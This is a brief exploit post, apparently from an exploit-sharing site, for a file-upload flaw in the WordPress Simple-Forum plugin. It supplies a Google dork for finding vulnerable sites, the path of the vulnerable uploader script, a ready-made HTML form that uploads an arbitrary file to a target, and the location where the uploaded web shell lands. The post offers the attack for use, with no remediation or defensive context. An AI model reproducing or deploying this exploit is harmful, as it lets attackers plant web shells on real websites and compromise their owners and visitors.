WP Exploit
- Title : Wordpress Simple-Forum CSRF Vulnerability - Author : FathurFreakz - Google Dork : inurl:/plugins/simple-forum/ - Exploit : wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php - CSRF Exploit : <form enctype="multipart/form-data" action="http://site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post"> <input type="file" name="url" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> - Shell : http://www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php
WP Exploit